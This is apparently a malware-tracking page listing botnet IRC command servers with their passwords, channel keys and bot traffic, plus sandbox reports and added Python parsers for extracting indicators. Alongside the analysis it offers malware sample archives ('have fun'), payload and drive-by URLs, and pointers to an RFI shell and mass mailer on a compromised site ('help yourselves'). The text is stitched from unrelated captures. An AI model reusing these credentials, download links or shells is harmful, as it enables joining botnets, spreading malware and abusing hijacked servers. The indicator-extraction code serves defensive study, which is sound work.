00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...
hosting infos:
http://whois.domaintools.com/115.239.230.73
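The hex dump above is the raw client-to-server stream, and its ASCII column hides the bytes that matter (the two bytes after the nick show as ".."). Added example, not code from the original page or from the bot's author: a small Python decoder that rebuilds the byte stream from the hex column only, splits it on CRLF the way an IRC server would, and pulls the port-scan reports (mode, target, port, delay, duration, threads) out of each message. Note that the captured bytes carry the verbs "PRRVMSG" and "KCIK" rather than PRIVMSG and NICK (0x50525256... and 0x4B43494B in the dump), so the extractor matches on the report text, not the verb. The sample dump is the first ten lines of the page's own dump, embedded as a constructed input.

```python
import re

# Constructed sample: the first ten lines of the hex dump reproduced on this
# page (offset | hex words | ASCII), enough to hold the IRC PASS and the first
# port-scan report the bot sends to its controller.
SAMPLE_DUMP = """\
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
"""

# offset | hex column | ...  (only the first two columns are used)
DUMP_LINE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*\|\s*([0-9A-Fa-f ]+?)\s*\|")
SCAN_RE = re.compile(
    r"(Random|Sequential) Port Scan started on (\S+):(\d+) with a delay of "
    r"(\d+) seconds for (\d+) minutes using (\d+) threads"
)


def decode_dump(dump: str) -> bytes:
    """Rebuild the raw byte stream from an 'offset | hex | ascii' dump.

    Only the hex column is trusted: the ASCII column replaces non-printable
    bytes with '.', so it cannot be used to recover the stream."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)


def irc_lines(stream: bytes):
    """Split a raw IRC client stream on CRLF. The trailing fragment (a line the
    capture cut before its CRLF) is dropped rather than guessed at."""
    text = stream.decode("latin-1")  # keeps the stray 0xBC 0xB9 bytes as-is
    return text.split("\r\n")[:-1]


def extract_irc_password(lines):
    """Return the argument of the PASS command, the botnet's shared secret."""
    for ln in lines:
        if ln.startswith("PASS "):
            return ln[5:].strip()
    return None


def extract_port_scans(lines):
    """Pull the scan reports out regardless of the verb in front of them (the
    capture shows 'PRRVMSG' and 'KCIK' rather than PRIVMSG/NICK)."""
    scans = []
    for ln in lines:
        m = SCAN_RE.search(ln)
        if m:
            scans.append({
                "mode": m.group(1),
                "target": m.group(2),
                "port": int(m.group(3)),
                "delay_s": int(m.group(4)),
                "minutes": int(m.group(5)),
                "threads": int(m.group(6)),
            })
    return scans


if __name__ == "__main__":
    stream = decode_dump(SAMPLE_DUMP)
    lines = irc_lines(stream)
    print("IRC password:", extract_irc_password(lines))
    for scan in extract_port_scans(lines):
        print(scan)
```

Feed the whole dump from the page through `decode_dump` and the four scan reports (174.133.x.x, 192.168.0.0, 192.168.62.0, 192.0.0.0, all on 445) and the HTTP update URL come out as separate lines; the "x.x" in the first target is in the bot's own report, not a redaction by the decoder.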
42 MB malware samples
This package has a lot of RATs and banking trojans inside.
have fun
Download:
http://c3266cfc.tubeviral.com
irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO
Remote Host Port Number
50.28.21.18 7659 PASS fuck
NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422
hosting infos:
http://whois.domaintools.com/50.28.21.18
209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)
Remote Host Port Number
209.172.59.146 5794 PASS ngrBot
213.251.170.52 80
74.53.197.4 80
NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) - Redirected 15 domain(s)
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt
EXE File:
http://conectaamor.com/_server/editor/images/fudnew2.exe
RFI SHELL:
http://conectaamor.com/_server/editor/images/lang.php (find the password yourself)
Mailer:
http://conectaamor.com/_server/editor/images/mailer.php (help yourselves, lol)
hosting infos:
http://whois.domaintools.com/209.172.59.146
ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)
Remote Host Port Number
205.185.122.148 6667 PASS nickz23
205.185.122.148 80
NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots
* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe
hosting infos:
http://whois.domaintools.com/205.185.122.148
jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)
Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot.
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE
Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb
Detection:
2/41 in virustotal
hosting infos:
http://whois.domaintools.com/184.107.143.126
212.7.214.39(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
Remote Host Port Number
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/3581947473/jamesbond.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG"
* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
o http://api.wipmania.com/
hosting infos:
http://whois.domaintools.com/212.7.214.39
193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)
Remote Host Port Number
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80
NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691
hosting infos:
http://whois.domaintools.com/193.106.172.131
12 MB malware samples
Mostly botnets and banking trojans
have fun
Download:
http://e422237e.tubeviral.com
Worm.Win32.FFAuto.uy
Exe file:
http://123back.com/1.EXE
Java drive by:
http://123back.com/
* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3001 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"
File Changes by all processes
New Files \Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Opened Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
\\.\PIPE\lsarpc
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Chronological Order Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
hosting infos:
http://whois.domaintools.com/173.248.136.153
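The sandbox report above, like the bozoo.no-ip.biz report further down, buries its one important line among dozens of routine registry reads: the write to the Winlogon "Taskman" value (a logon autostart location that Autoruns lists) pointing at the freshly dropped, hidden+system hgfrhf.exe, and in the bozoo case an HKCU Run value for mstwain32.exe. Added example, not code from the original page or from either sample's author: a Python pass over sandbox-style "Changes"/"Reads"/file-operation lines that flags writes to autostart locations and dropped copies that are then marked hidden and system. The event lines are constructed from the two reports on this page; the autostart list is an assumed, deliberately small subset of the locations a full autostart scanner checks.

```python
import re
from typing import Dict, List

# Constructed sample: registry and file events copied from the two sandbox
# reports on this page (Worm.Win32.FFAuto.uy and the bozoo.no-ip.biz sample),
# plus the benign reads that surround them in such reports.
SAMPLE_EVENTS = r"""
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
"""

# Assumed subset of autostart locations: (key suffix, allowed value names or
# None for "any value under this key"). Compared case-insensitively.
AUTOSTART = [
    (r"\Microsoft\Windows NT\CurrentVersion\Winlogon", {"Taskman", "Shell", "Userinit"}),
    (r"\Microsoft\Windows\CurrentVersion\Run", None),
    (r"\Microsoft\Windows\CurrentVersion\RunOnce", None),
    (r"\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", None),
]

REG_CHANGE = re.compile(r'^Changes (HKEY_[A-Z_]+\\.+?) "([^"]*)" = (.*)$')
FILE_COPY = re.compile(r"^Copy File: (.+?) to (.+)$")
FILE_ATTR = re.compile(r"^Set File Attributes: (.+?) Flags: \((.*)\)$")


def persistence_findings(report: str) -> List[Dict[str, object]]:
    """Return one finding per autostart write or hidden+system dropped file.
    'Reads' lines are ignored: reading an autostart value is normal, writing
    one from a fresh sample is not."""
    findings: List[Dict[str, object]] = []
    dropped = set()  # destination paths of Copy File operations, lowercased
    for line in report.splitlines():
        line = line.strip()
        m = REG_CHANGE.match(line)
        if m:
            key, value, data = m.groups()
            for suffix, names in AUTOSTART:
                if key.lower().endswith(suffix.lower()) and (names is None or value in names):
                    findings.append({"type": "registry_autostart", "key": key,
                                     "value": value, "target": data})
            continue
        m = FILE_COPY.match(line)
        if m:
            dropped.add(m.group(2).lower())
            continue
        m = FILE_ATTR.match(line)
        if m:
            path, flags = m.groups()
            flag_set = set(flags.split())
            # Hidden + system together is the classic "hide from Explorer" trick.
            if {"FILE_ATTRIBUTE_HIDDEN", "FILE_ATTRIBUTE_SYSTEM"} <= flag_set:
                findings.append({"type": "hidden_system_file", "path": path,
                                 "dropped_copy": path.lower() in dropped})
    return findings


if __name__ == "__main__":
    for finding in persistence_findings(SAMPLE_EVENTS):
        print(finding)
```

The EnableLUA read in the sample is left alone on purpose: a sample checking whether UAC is on is worth noting in a report, but it is not persistence, and flagging every read would recreate the noise the filter is meant to remove.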
91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting
Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]
hosting infos:
http://whois.domaintools.com/91.211.117.46
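Across the ngrBot captures on this page the same few IRC lines carry everything an analyst needs: the fixed "PASS ngrBot" secret, the n{CC|OS}random nick, the channel key on JOIN, download URLs in the "[d=...]" status reports, the lure URLs in the "Updated ... spread message" reports (the Spanish lures read "did you see the new photos on my facebook?" and "haha look at this, download it"), and the controller's commands parked in the channel topic (here ".up URL MD5 -r" to update the bot with a hash to verify against, ".mdns URL" to fetch a DNS-blocking list; the #start botnet above uses the "*mdns", "*msn.int", "*msn.set" spelling). Added example, not code from the original page or from the bot's authors: a Python extractor that turns such a session into a structured IOC record, with the topic split into (command, arguments) pairs. The session is constructed by stitching lines from the 91.211.117.46, 92.241.165.115 and 193.107.16.111 captures together, and the ngrBot fingerprint at the end is drawn only from what these captures show.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: IRC lines from this page's 91.211.117.46, 92.241.165.115
# and 193.107.16.111 captures, stitched into one session for the parser.
SAMPLE_SESSION = r"""
PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
PRIVMSG #main :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #main :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0
PRIVMSG #main :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
JOIN #start romeo
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
"""

NICK_RE = re.compile(r"^NICK n\{([A-Z]{2})\|([^}]+)\}\w+$")
JOIN_RE = re.compile(r"^JOIN (#\S+)(?: (\S+))?$")
TOPIC_RE = re.compile(r"^Topic On: \[ (#\S+) \] \[ (.*) \]$")
DL_RE = re.compile(r'\[d="([^"]+)"')
SPREAD_RE = re.compile(r'Updated (?:HTTP|MSN) spread message to "([^"]*)"')
URL_RE = re.compile(r"https?://\S+")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")


@dataclass
class BotSession:
    password: Optional[str] = None
    country: Optional[str] = None
    os_tag: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)   # channel -> key
    topic_commands: Dict[str, List[Tuple[str, str]]] = field(default_factory=dict)
    download_urls: List[str] = field(default_factory=list)
    lure_urls: List[str] = field(default_factory=list)
    update_hashes: List[str] = field(default_factory=list)

    def all_urls(self) -> List[str]:
        """Every URL seen anywhere in the session, de-duplicated."""
        urls = list(self.download_urls) + list(self.lure_urls)
        for cmds in self.topic_commands.values():
            for _, args in cmds:
                urls.extend(URL_RE.findall(args))
        return sorted(set(urls))


def parse_topic_commands(topic: str) -> List[Tuple[str, str]]:
    """Split '.m off .up URL MD5 -r .mdns URL' into (command, args) pairs.
    A token starting with '.' or '*' opens a command; everything up to the
    next such token is that command's argument string."""
    cmds: List[Tuple[str, str]] = []
    for tok in topic.split():
        if tok[0] in ".*" and len(tok) > 1:
            cmds.append((tok, ""))
        elif cmds:
            cmd, args = cmds[-1]
            cmds[-1] = (cmd, (args + " " + tok).strip())
    return cmds


def parse_session(text: str) -> BotSession:
    s = BotSession()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("PASS "):
            s.password = line[5:].strip()
            continue
        m = NICK_RE.match(line)
        if m:
            s.country, s.os_tag = m.group(1), m.group(2)
            continue
        m = JOIN_RE.match(line)
        if m:
            s.channels[m.group(1)] = m.group(2)
            continue
        m = TOPIC_RE.match(line)
        if m:
            cmds = parse_topic_commands(m.group(2))
            s.topic_commands[m.group(1)] = cmds
            for cmd, args in cmds:
                if cmd.lstrip(".*") == "up":        # update command carries the MD5 of the new binary
                    s.update_hashes.extend(MD5_RE.findall(args))
            continue
        if line.startswith("PRIVMSG "):
            s.download_urls.extend(DL_RE.findall(line))
            for msg in SPREAD_RE.findall(line):
                s.lure_urls.extend(URL_RE.findall(msg))
    return s


def looks_like_ngrbot(s: BotSession) -> bool:
    """Fingerprint drawn only from the captures on this page: the fixed IRC
    password 'ngrBot' or the n{CC|OS}random nick format. Treat it as a hint,
    not a signature."""
    return s.password == "ngrBot" or (s.country is not None and s.os_tag is not None)


if __name__ == "__main__":
    session = parse_session(SAMPLE_SESSION)
    print("ngrBot-like:", looks_like_ngrbot(session))
    print("channels:", session.channels)
    print("update hashes:", session.update_hashes)
    for url in session.all_urls():
        print("  ", url)
```

The MD5 that rides along with ".up" is the one thing in the topic worth keeping beyond the URLs: it is the hash of the binary the controller expects the bots to fetch, so it can be searched for directly in a sample repository even after the hosting URL is dead.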
bozoo.no-ip.biz
bozoo.no-ip.biz 94.120.148.91
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963 (logged 11 times)
Registry Changes by all processes
Create or Open
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
